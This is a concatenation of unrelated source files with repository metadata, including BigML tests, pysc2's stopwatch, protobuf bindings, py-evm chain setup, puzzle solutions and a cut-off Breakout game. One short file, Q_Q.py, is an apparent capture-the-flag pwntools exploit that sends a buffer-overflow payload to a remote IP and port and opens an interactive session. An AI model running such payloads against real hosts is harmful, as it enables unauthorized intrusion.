| data | time_1 | time_2 | time_3 | exported_file | params | tag
| ../data/iris.csv | 10 | 10 | 50 | ./tmp/fusion.json
"""
print(self.test_scenario10.__doc__)
examples = [
['data/iris.csv', '10', '10', '50', './tmp/fusion.json', 'my_fusion_tag']]
for example in examples:
print("\nTesting with:\n", example)
tag = example[5]
tag_args = '{"tags":["%s"]}' % tag
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
model_create.i_create_a_model_with(self, tag_args)
model_create.the_model_is_finished_in_less_than(self, example[3])
model_create.i_create_a_model_with(self, tag_args)
model_create.the_model_is_finished_in_less_than(self, example[3])
model_create.i_create_a_model_with(self, tag_args)
model_create.the_model_is_finished_in_less_than(self, example[3])
prediction_compare.i_retrieve_a_list_of_remote_models(self, tag)
model_create.i_create_a_fusion(self)
model_create.the_fusion_is_finished_in_less_than(self, example[3])
model_create.i_export_fusion(self, example[4])
model_create.i_create_local_fusion_from_file(self, example[4])
model_create.check_fusion_id_local_id(self)
def test_scenario11(self):
"""
Scenario 11: Successfully creating a local linear regression from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a linear regression
And I wait until the linear regression is ready less than <time_3> secs
And I export the linear regression to "<exported_file>"
When I create a local linear regression from the file "<exported_file>"
Then the linear regression ID and the local linear regression ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
| ../data/grades.csv | 10 | 10 | 50 | ./tmp/linear.json
"""
print(self.test_scenario11.__doc__)
examples = [
['data/grades.csv', '20', '20', '50', './tmp/linear.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
linear_create.i_create_a_linear_regression_from_dataset(self)
linear_create.the_linear_regression_is_finished_in_less_than(self, example[3])
model_create.i_export_linear_regression(self, example[4])
model_create.i_create_local_linear_regression_from_file(self, example[4])
model_create.check_linear_regression_id_local_id(self)
| [
"[email protected]"
] | |
823128232096e5a64b6c166ca62a3b471935bf31 | 4d01bd8003ac64b2a688db12108b472387c999c4 | /Q_Q.py | a27e43ccf178755bb31aa68761a4fffd6c588111 | [] | no_license | BlackHat-S/PWN | 2ef6aa7db3baafe009ac31631bdaffaf043f3b85 | cde1f9ee3258aa56c2634995d5baec14b500a399 | refs/heads/master | 2021-01-07T00:44:20.208899 | 2020-03-21T04:16:14 | 2020-03-21T04:29:47 | 241,529,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | from pwn import *
#p=process('./Q_Q')
p=remote('121.40.92.129',28022)
#gdb.attach(p)
s2='you\x11need"pwntools!3'
#s2=p32(0x11756F79)
#s2=p32(0x6e11756f)
p.sendline(s2)
payload='a'*19+p32(0x8181B1B)
p.sendline(payload)
p.interactive()
| [
"[email protected]"
] | |
39763dada35168638ae5e1e8b7ec0faa6847b5ba | 0775a2175ddc9f41b4f7637a388623ca9ef15259 | /chap8/16.子数组的最大累加和问题/16_maxSubArray.py | fb63c569d4ab173bbb1254567316ee40c6b6c431 | [] | no_license | huang-jingwei/Coding-Interview-Guide | 6839876457b3cf01a08c5623463e66fe9efa7416 | a42f45213c94d529f69a61f0bda92eddfe5bdfea | refs/heads/master | 2023-04-16T20:05:40.615475 | 2021-05-05T03:32:25 | 2021-05-05T03:32:25 | 286,343,194 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | class Solution:
def maxSubArray(self, nums: List[int]) -> int:
if len(nums) == 1: # 只有一个元素
return nums[0]
maxSubArraySum = [0] * len(nums)
for index in range(len(maxSubArraySum)):
if index == 0:
maxSubArraySum[index] = nums[index]
elif index > 0:
if maxSubArraySum[index - 1] >= 0:
maxSubArraySum[index] = maxSubArraySum[index - 1] + nums[index]
else:
maxSubArraySum[index] = nums[index]
return max(maxSubArraySum) | [
"[email protected]"
] | |
1801f478f73579ae23ce3d61b2ed1d64b5c7e40f | 1cc8604dff9713d3879599f1876a6ea313ebe1fb | /pysc2/lib/stopwatch.py | 6c4202c859716afb77ef1155c82b1955ffcfd8d1 | [
"Apache-2.0"
] | permissive | SoyGema/pysc2 | c363ec768ebf94e7b0fa08e136b36b7432ae1b44 | e5de62023ec45ac212016b5404dd73272109d9d4 | refs/heads/master | 2022-02-08T21:41:46.530129 | 2022-01-29T13:11:15 | 2022-01-29T13:11:15 | 143,897,552 | 1 | 0 | Apache-2.0 | 2018-08-07T16:06:23 | 2018-08-07T16:06:22 | null | UTF-8 | Python | false | false | 7,935 | py | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A stopwatch to check how much time is used by bits of code."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import math
import os
import sys
import threading
import time
from future.builtins import range # pylint: disable=redefined-builtin
import six
class Stat(object):
"""A set of statistics about a single value series."""
__slots__ = ("num", "min", "max", "sum", "sum_sq")
def __init__(self):
self.reset()
def reset(self):
self.num = 0
self.min = 1000000000
self.max = 0
self.sum = 0
self.sum_sq = 0
def add(self, val):
self.num += 1
if self.min > val:
self.min = val
if self.max < val:
self.max = val
self.sum += val
self.sum_sq += val**2
@property
def avg(self):
return 0 if self.num == 0 else self.sum / self.num
@property
def dev(self):
"""Standard deviation."""
if self.num == 0:
return 0
return math.sqrt(max(0, self.sum_sq / self.num - (self.sum / self.num)**2))
def merge(self, other):
self.num += other.num
self.min = min(self.min, other.min)
self.max = max(self.max, other.max)
self.sum += other.sum
self.sum_sq += other.sum_sq
@staticmethod
def build(summation, average, standard_deviation, minimum, maximum, number):
stat = Stat()
if number > 0:
stat.num = number
stat.min = minimum
stat.max = maximum
stat.sum = summation
stat.sum_sq = number * (standard_deviation**2 + average**2)
return stat
@staticmethod
def parse(s):
if s == "num=0":
return Stat()
parts = (float(p.split(":")[1]) for p in s.split(", "))
return Stat.build(*parts)
def __str__(self):
if self.num == 0:
return "num=0"
return "sum: %.4f, avg: %.4f, dev: %.4f, min: %.4f, max: %.4f, num: %d" % (
self.sum, self.avg, self.dev, self.min, self.max, self.num)
class StopWatchContext(object):
"""Time an individual call."""
__slots__ = ("_sw", "_start")
def __init__(self, stopwatch, name):
self._sw = stopwatch
self._sw.push(name)
def __enter__(self):
self._start = time.time()
def __exit__(self, unused_exception_type, unused_exc_value, unused_traceback):
self._sw.add(self._sw.pop(), time.time() - self._start)
class TracingStopWatchContext(StopWatchContext):
"""Time an individual call, but also output all the enter/exit calls."""
def __enter__(self):
super(TracingStopWatchContext, self).__enter__()
self._log(">>> %s" % self._sw.cur_stack())
def __exit__(self, *args, **kwargs):
self._log("<<< %s: %.6f secs" % (self._sw.cur_stack(),
time.time() - self._start))
super(TracingStopWatchContext, self).__exit__(*args, **kwargs)
def _log(self, s):
print(s, file=sys.stderr)
class FakeStopWatchContext(object):
"""A fake stopwatch context for when the stopwatch is too slow or unneeded."""
__slots__ = ()
def __enter__(self):
pass
def __exit__(self, unused_exception_type, unused_exc_value, unused_traceback):
pass
fake_context = FakeStopWatchContext()
class StopWatch(object):
"""A context manager that tracks call count and latency, and other stats.
Usage:
sw = stopwatch.Stopwatch()
with sw("foo"):
foo()
with sw("bar"):
bar()
@sw.decorate
def func():
pass
func()
print(sw)
"""
__slots__ = ("_times", "_local", "_factory")
def __init__(self, enabled=True, trace=False):
self._times = collections.defaultdict(Stat)
self._local = threading.local()
if trace:
self.trace()
elif enabled:
self.enable()
else:
self.disable()
def disable(self):
self._factory = lambda _: fake_context
def enable(self):
self._factory = lambda name: StopWatchContext(self, name)
def trace(self):
self._factory = lambda name: TracingStopWatchContext(self, name)
def custom(self, factory):
self._factory = factory
def __call__(self, name):
return self._factory(name)
def decorate(self, name_or_func):
"""Decorate a function/method to check its timings.
To use the function's name:
@sw.decorate
def func():
pass
To name it explicitly:
@sw.decorate("name")
def random_func_name():
pass
Args:
name_or_func: the name or the function to decorate.
Returns:
If a name is passed, returns this as a decorator, otherwise returns the
decorated function.
"""
if os.environ.get("SC2_NO_STOPWATCH"):
return name_or_func if callable(name_or_func) else lambda func: func
def decorator(name, func):
@functools.wraps(func)
def _stopwatch(*args, **kwargs):
with self(name):
return func(*args, **kwargs)
return _stopwatch
if callable(name_or_func):
return decorator(name_or_func.__name__, name_or_func)
else:
return lambda func: decorator(name_or_func, func)
def push(self, name):
try:
self._local.stack.append(name)
except AttributeError:
# Using an exception is faster than using hasattr.
self._local.stack = [name]
def pop(self):
stack = self._local.stack
ret = ".".join(stack)
stack.pop()
return ret
def cur_stack(self):
return ".".join(self._local.stack)
def clear(self):
self._times.clear()
def add(self, name, duration):
self._times[name].add(duration)
def __getitem__(self, name):
return self._times[name]
@property
def times(self):
return self._times
def merge(self, other):
for k, v in six.iteritems(other.times):
self._times[k].merge(v)
@staticmethod
def parse(s):
"""Parse the output below to create a new StopWatch."""
stopwatch = StopWatch()
for line in s.splitlines():
if line.strip():
parts = line.split(None)
name = parts[0]
if name != "%": # ie not the header line
rest = (float(v) for v in parts[2:])
stopwatch.times[parts[0]].merge(Stat.build(*rest))
return stopwatch
def str(self, threshold=0.1):
"""Return a string representation of the timings."""
if not self._times:
return ""
total = sum(s.sum for k, s in six.iteritems(self._times) if "." not in k)
table = [["", "% total", "sum", "avg", "dev", "min", "max", "num"]]
for k, v in sorted(self._times.items()):
percent = 100 * v.sum / (total or 1)
if percent > threshold: # ignore anything below the threshold
table.append([
k,
"%.2f%%" % percent,
"%.4f" % v.sum,
"%.4f" % v.avg,
"%.4f" % v.dev,
"%.4f" % v.min,
"%.4f" % v.max,
"%d" % v.num,
])
col_widths = [max(len(row[i]) for row in table)
for i in range(len(table[0]))]
out = ""
for row in table:
out += " " + row[0].ljust(col_widths[0]) + " "
out += " ".join(
val.rjust(width) for val, width in zip(row[1:], col_widths[1:]))
out += "\n"
return out
def __str__(self):
return self.str()
# Global stopwatch is disabled by default to not incur the performance hit if
# it's not wanted.
sw = StopWatch(enabled=False)
| [
"[email protected]"
] | |
ea06394e335fad81afcb39da877df9cf15fbc2d3 | bc441bb06b8948288f110af63feda4e798f30225 | /translate_sdk/model/ops_automation/job_tasks_pb2.py | c0f92286f95c90cdfcca776560baf3bce86aceeb | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | true | 10,518 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: job_tasks.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from translate_sdk.model.ops_automation import mail_info_pb2 as translate__sdk_dot_model_dot_ops__automation_dot_mail__info__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='job_tasks.proto',
package='ops_automation',
syntax='proto3',
serialized_options=_b('ZHgo.easyops.local/contracts/protorepo-models/easyops/model/ops_automation'),
serialized_pb=_b('\n\x0fjob_tasks.proto\x12\x0eops_automation\x1a\x32translate_sdk/model/ops_automation/mail_info.proto\"\x82\x03\n\x08JobTasks\x12\n\n\x02id\x18\x01 \x01(\t\x12\r\n\x05jobId\x18\x02 \x01(\t\x12\x0f\n\x07jobName\x18\x03 \x01(\t\x12\x10\n\x08menuName\x18\x04 \x01(\t\x12\x0e\n\x06\x65xecId\x18\x05 \x01(\t\x12\x14\n\x0cresourceType\x18\x06 \x01(\t\x12\x12\n\nresourceId\x18\x07 \x01(\t\x12\x13\n\x0bresourceVId\x18\x08 \x01(\t\x12\x15\n\rresourceVName\x18\t \x01(\t\x12\x0f\n\x07trigger\x18\n \x01(\t\x12\x10\n\x08\x65xecUser\x18\x0b \x01(\t\x12\r\n\x05hosts\x18\x0c \x03(\t\x12\x0e\n\x06status\x18\r \x01(\t\x12&\n\x04mail\x18\x0e \x01(\x0b\x32\x18.ops_automation.MailInfo\x12\x13\n\x0bsuccessRate\x18\x0f \x01(\x02\x12\r\n\x05\x65rror\x18\x10 \x01(\t\x12\x12\n\ncreateTime\x18\x11 \x01(\t\x12\x12\n\nupdateTime\x18\x12 \x01(\t\x12\x0f\n\x07\x63reator\x18\x13 \x01(\t\x12\x0b\n\x03org\x18\x14 \x01(\x05\x42JZHgo.easyops.local/contracts/protorepo-models/easyops/model/ops_automationb\x06proto3')
,
dependencies=[translate__sdk_dot_model_dot_ops__automation_dot_mail__info__pb2.DESCRIPTOR,])
_JOBTASKS = _descriptor.Descriptor(
name='JobTasks',
full_name='ops_automation.JobTasks',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='ops_automation.JobTasks.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='jobId', full_name='ops_automation.JobTasks.jobId', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='jobName', full_name='ops_automation.JobTasks.jobName', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='menuName', full_name='ops_automation.JobTasks.menuName', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='execId', full_name='ops_automation.JobTasks.execId', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resourceType', full_name='ops_automation.JobTasks.resourceType', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resourceId', full_name='ops_automation.JobTasks.resourceId', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resourceVId', full_name='ops_automation.JobTasks.resourceVId', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resourceVName', full_name='ops_automation.JobTasks.resourceVName', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='trigger', full_name='ops_automation.JobTasks.trigger', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='execUser', full_name='ops_automation.JobTasks.execUser', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='hosts', full_name='ops_automation.JobTasks.hosts', index=11,
number=12, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='status', full_name='ops_automation.JobTasks.status', index=12,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='mail', full_name='ops_automation.JobTasks.mail', index=13,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='successRate', full_name='ops_automation.JobTasks.successRate', index=14,
number=15, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='error', full_name='ops_automation.JobTasks.error', index=15,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='createTime', full_name='ops_automation.JobTasks.createTime', index=16,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='updateTime', full_name='ops_automation.JobTasks.updateTime', index=17,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='creator', full_name='ops_automation.JobTasks.creator', index=18,
number=19, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='org', full_name='ops_automation.JobTasks.org', index=19,
number=20, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=88,
serialized_end=474,
)
_JOBTASKS.fields_by_name['mail'].message_type = translate__sdk_dot_model_dot_ops__automation_dot_mail__info__pb2._MAILINFO
DESCRIPTOR.message_types_by_name['JobTasks'] = _JOBTASKS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
JobTasks = _reflection.GeneratedProtocolMessageType('JobTasks', (_message.Message,), {
'DESCRIPTOR' : _JOBTASKS,
'__module__' : 'job_tasks_pb2'
# @@protoc_insertion_point(class_scope:ops_automation.JobTasks)
})
_sym_db.RegisterMessage(JobTasks)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
8ea422ab7d7637a015b6fe31a0e25db3f3cae371 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_75/561.py | 36d9557ad1663cf9120d0f6c51352667ae7b8581 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,015 | py | import sys
import re
input = sys.stdin
T=int(input.readline())
for i in xrange(1,T+1):
data = input.readline()
data = data.split()
C = int(data[0])
cs = data[1:1+C]
CS = {}
for s in cs:
CS["%s%s" % (s[0], s[1])] = s[2]
CS["%s%s" % (s[1], s[0])] = s[2]
D = int(data[1+C])
ds = data[1+C+1:1+C+1+D]
DS = {}
for s in ds:
DS[s[0]] = s[1]
DS[s[1]] = s[0]
N = int(data[1+C+1+D])
ns = data[1+C+1+D+1:]
S = ns[0] # one string
res = []
opposite = None
pair = None
for s in S:
if len(res):
k1 = "%s%s" % (res[-1], s)
if k1 in CS:
res[-1] = CS[k1]
continue
if s in DS:
if DS[s] in res:
# res = res[0:res.index(DS[s])]
res = []
continue
res.append(s)
# print data
# print C, cs, CS
# print D, ds, DS
# print N, ns
print re.sub("'", '', "Case #%s: %s" % (i, res))
| [
"[email protected]"
] | |
01a2e6b7af0a367e62438e4d324ed24336970776 | 9c1b28d9564cfde450f6590031ede667650d494f | /player/tasks.py | ade314e4fae37740ac46ba2df18ee15c5805a719 | [] | no_license | gdmurray/rankedgg-backend | 90f887f4d64ca5a38741ac8e9482f08fc5d6fd7e | ac312750a09a70907fe3e5a9ae9e1172c5e341d8 | refs/heads/master | 2022-12-18T16:54:27.302293 | 2019-03-24T05:24:23 | 2019-03-24T05:24:23 | 177,320,244 | 0 | 0 | null | 2022-12-08T04:54:05 | 2019-03-23T17:36:14 | Python | UTF-8 | Python | false | false | 746 | py | from ranked.celery import app
from .models import Player
from channels.layers import get_channel_layer
from asgiref.sync import async_to_sync
@app.task
def update_ranked_data(pk, region=None):
player = Player.objects.get(id=pk)
print(f"Updating Ranked Data for {player.username}")
metadata, updated_player = player.fetch_metadata(include_player=True)
from .serializers import PlayerLeaderBoardSerializer
serializer = PlayerLeaderBoardSerializer(updated_player, many=False,
context={"region": region, "from_task": True}).data
layer = get_channel_layer()
async_to_sync(layer.group_send)('updates', {
'type': 'player_updates',
'content': serializer
})
| [
"[email protected]"
] | |
62cb22669072ff1e224be98f36817be8899fa801 | b3ba7762ae4e209a02bf3a47dc40ceff421087d2 | /evm/chains/tester/__init__.py | fd1cdb4b31fe590a3b5ecfd0a0e1dfd75159d7ee | [] | no_license | nicksavers/py-evm | 3c740ae328c5dd0f10c967660a4e452d257fdfa3 | 70631e3b726d093749a7315b8a4c6b1ebc4d7322 | refs/heads/master | 2021-08-15T21:35:19.556248 | 2017-11-17T21:20:24 | 2017-11-17T21:20:24 | 111,194,384 | 3 | 0 | null | 2017-11-18T09:56:00 | 2017-11-18T09:55:59 | null | UTF-8 | Python | false | false | 4,795 | py | from cytoolz import (
assoc,
)
from eth_utils import (
reversed_return,
)
from evm.chains.chain import Chain
from evm.vm.forks import (
FrontierVM as BaseFrontierVM,
HomesteadVM as BaseHomesteadVM,
EIP150VM as BaseEIP150VM,
SpuriousDragonVM as BaseSpuriousDragonVM,
)
from evm.utils.chain import (
generate_vms_by_range,
)
class MaintainGasLimitMixin(object):
@classmethod
def create_header_from_parent(cls, parent_header, **header_params):
"""
Call the parent class method maintaining the same gas_limit as the
previous block.
"""
return super(MaintainGasLimitMixin, cls).create_header_from_parent(
parent_header,
**assoc(header_params, 'gas_limit', parent_header.gas_limit)
)
class FrontierTesterVM(MaintainGasLimitMixin, BaseFrontierVM):
pass
class BaseHomesteadTesterVM(MaintainGasLimitMixin, BaseHomesteadVM):
pass
class EIP150TesterVM(MaintainGasLimitMixin, BaseEIP150VM):
pass
class SpuriousDragonTesterVM(MaintainGasLimitMixin, BaseSpuriousDragonVM):
pass
INVALID_FORK_ACTIVATION_MSG = (
"The {0}-fork activation block may not be null if the {1}-fork block "
"is non null"
)
@reversed_return
def _generate_vm_configuration(homestead_start_block=None,
dao_start_block=None,
eip150_start_block=None,
spurious_dragon_block=None):
# If no explicit configuration has been passed, configure the vm to start
# with the latest fork rules at block 0
no_declared_blocks = (
spurious_dragon_block is None and
eip150_start_block is None and
homestead_start_block is None
)
if no_declared_blocks:
yield (0, SpuriousDragonTesterVM)
if spurious_dragon_block is not None:
yield (spurious_dragon_block, SpuriousDragonTesterVM)
remaining_blocks_not_declared = (
homestead_start_block is None and
eip150_start_block is None
)
if spurious_dragon_block > 0 and remaining_blocks_not_declared:
yield (0, EIP150TesterVM)
if eip150_start_block is not None:
yield (eip150_start_block, EIP150TesterVM)
# If the EIP150 rules do not start at block 0 and homestead_start_block has not
# been configured for a specific block, configure homestead_start_block to start at
# block 0.
if eip150_start_block > 0 and homestead_start_block is None:
HomesteadTesterVM = BaseHomesteadTesterVM.configure(
dao_fork_block_number=0,
)
yield (0, HomesteadTesterVM)
if homestead_start_block is not None:
if dao_start_block is False:
# If dao_start_block support has explicitely been configured as `False` then
# mark the HomesteadTesterVM as not supporting the fork.
HomesteadTesterVM = BaseHomesteadTesterVM.configure(support_dao_fork=False)
elif dao_start_block is not None:
# Otherwise, if a specific dao_start_block fork block has been set, use it.
HomesteadTesterVM = BaseHomesteadTesterVM.configure(
dao_fork_block_number=dao_start_block,
)
else:
# Otherwise, default to the homestead_start_block block as the
# start of the dao_start_block fork.
HomesteadTesterVM = BaseHomesteadTesterVM.configure(
dao_fork_block_number=homestead_start_block,
)
yield (homestead_start_block, HomesteadTesterVM)
# If the homestead_start_block block is configured to start after block 0, set the
# frontier rules to start at block 0.
if homestead_start_block > 0:
yield (0, FrontierTesterVM)
BaseMainnetTesterChain = Chain.configure(
'MainnetTesterChain',
vm_configuration=_generate_vm_configuration()
)
class MainnetTesterChain(BaseMainnetTesterChain):
def validate_seal(self, block):
"""
We don't validate the proof of work seal on the tester chain.
"""
pass
def configure_forks(self,
homestead_start_block=None,
dao_start_block=None,
eip150_start_block=None,
spurious_dragon_block=None):
"""
TODO: add support for state_cleanup
"""
vm_configuration = _generate_vm_configuration(
homestead_start_block=homestead_start_block,
dao_start_block=dao_start_block,
eip150_start_block=eip150_start_block,
spurious_dragon_block=spurious_dragon_block,
)
self.vms_by_range = generate_vms_by_range(vm_configuration)
| [
"[email protected]"
] | |
95ab80f3fc1195c06b5ffcbf8b1f17dc0ef31ab7 | 291fe7fb4cc5b682e560b0c5958e2220054451c6 | /Big41/ch4/조건문1.py | c57b278f55bd2e596e39e220b35dc5942d768772 | [] | no_license | MinksChung/BigdataCourse | 44dc5e7e578515e1dafbb7870911e09347a788f4 | 293803415da5d9f354059ea556818cc7610f36a5 | refs/heads/master | 2022-12-22T06:14:59.880933 | 2020-01-26T14:58:09 | 2020-01-26T14:58:09 | 202,575,724 | 0 | 0 | null | 2022-12-15T23:28:43 | 2019-08-15T16:29:35 | Python | UTF-8 | Python | false | false | 761 | py | # print("파이썬 2번째 날입니다.")
# age = 100
#
# if age >= 20:
# print("성인입니다.")
# else:
# print("미성인입니다.")
# 비교연산자를 스트링 비교에 사용할 수 있다.
# 제어문에 중간괄호({ })대신 :(콜론)을 사용한다.
# :을 사용하면 반드시 다음 아래줄에 들여쓰기를 해야한다.
# 들여쓰기 후, 꼭 처리 내용이나 pass를 써주어야 한다.
# login_id = 'root'
# if login_id == 'root':
# print('로그인 ok')
# else:
# pass
jumsu = 88
if jumsu >= 90:
print('A학점')
elif jumsu >= 80:
print('B학점')
elif jumsu >= 70:
print('C학점')
elif jumsu >= 60:
print('D학점')
else:
print('F학점')
| [
"[email protected]"
] | |
0412325572d786d5ff622d57872828e3ac3f1281 | d6c117812a618ff34055488337aaffea8cf81ca1 | /scenes/Breakout_Clone.py | 17e3ecd37edfce711d910432545e1bc7b564035f | [] | no_license | c0ns0le/Pythonista | 44829969f28783b040dd90b46d08c36cc7a1f590 | 4caba2d48508eafa2477370923e96132947d7b24 | refs/heads/master | 2023-01-21T19:44:28.968799 | 2016-04-01T22:34:04 | 2016-04-01T22:34:04 | 55,368,932 | 3 | 0 | null | 2023-01-22T01:26:07 | 2016-04-03T21:04:40 | Python | UTF-8 | Python | false | false | 7,869 | py | # -*- coding: utf-8 -*-
# https://gist.github.com/SebastianJarsve/5305895
# Created by Sebastian Jarsve
# 9. April 2013
from scene import *
from sound import play_effect
from random import randint
def centered_rect(x, y, w, h):
return Rect(x-w/2, y-h/2, w, h)
class Field(object):
def __init__(self):
size = screen_size
left = 0
bottom = 0
right = screen_size.w
top = screen_size.h
self.lines = [(left, bottom, left, top), (left, top, right, top), (right, top, right, bottom)]
def draw(self):
stroke_weight(4)
stroke(1,1,1)
for l in self.lines:
line(*l)
class Player(object):
def __init__(self):
self.rect = centered_rect(screen_size.w/2, 50, 100, 20)
self.lives = 3
def update(self):
self.rect.x += gravity().x * 50
self.rect.x = min(screen_size.w - 100, max(0, self.rect.x))
def draw(self):
fill(1,1,1)
rect(*self.rect)
class Ball(object):
def __init__(self):
self.rect = centered_rect(screen_size.w/2, 60, 20, 20)
self.vx = randint(-6, 6)
self.vy = 7
self.is_moving = False
def collide_with_paddle(self, paddle):
if self.rect.intersects(paddle.rect):
